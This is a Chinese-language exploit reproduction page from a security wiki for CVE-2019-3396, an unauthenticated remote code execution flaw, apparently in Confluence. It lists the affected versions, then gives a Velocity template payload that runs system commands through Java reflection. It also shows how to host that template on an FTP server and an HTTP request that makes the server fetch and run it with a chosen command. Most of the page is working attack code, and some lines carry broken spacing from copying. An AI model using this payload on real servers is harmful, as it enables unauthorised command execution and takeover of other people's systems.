(CVE-2019-3396)未授权RCE漏洞

一、漏洞简介

(CVE-2019-3396)未授权RCE漏洞

二、影响范围

  • 6.6.12之前所有6.6.x版本
  • 6.12.3之前所有6.12.x版
  • 6.13.13之前所有6.13.x版本
  • 6.14.2之前所有6.14.x版本

三、复现过程

1.开启一个FTP服务,根目录放置模板文件 r.vm

#set ($exp="exp")
#set 
($a=$exp.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).in voke(null,null).exec($command)) 
#set 
($input=$exp.getClass().forName("java.lang.Process").getMethod("getInputStream") .invoke($a))
#set($sc = $exp.getClass().forName("java.util.Scanner")) 
#set($constructor = 
$sc.getDeclaredConstructor($exp.getClass().forName("java.io.InputStream"))) 
#set($scan=$constructor.newInstance($input).useDelimiter("\\A")) 
#if($scan.hasNext())
    $scan.next()
#end

这里用 python 开启一个 FTP 服务进行演示:

pip install pyftpdlib 
python -m pyftpdlib -p 8883

回显命令执行:

POST /rest/tinymce/1/macro/preview  HTTP/1.1 
Host: localhost:8090 
Content-Length: 193 
Accept: text/plain, */*; q=0.01 
Origin: http://localhost:8090 
X-Requested-With: XMLHttpRequest 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 Content-Type: application/json; charset=UTF-8 
Referer: http://localhost:8090/ 
Connection: close


{"contentId":"1","macro":{"name":"widget","params": {"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_templat e":"ftp://127.0.0.1:8883/r.vm","command":"whoami"},"body":""}}

image

零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2019-11-04 00:39:10

results matching ""

    No results matching ""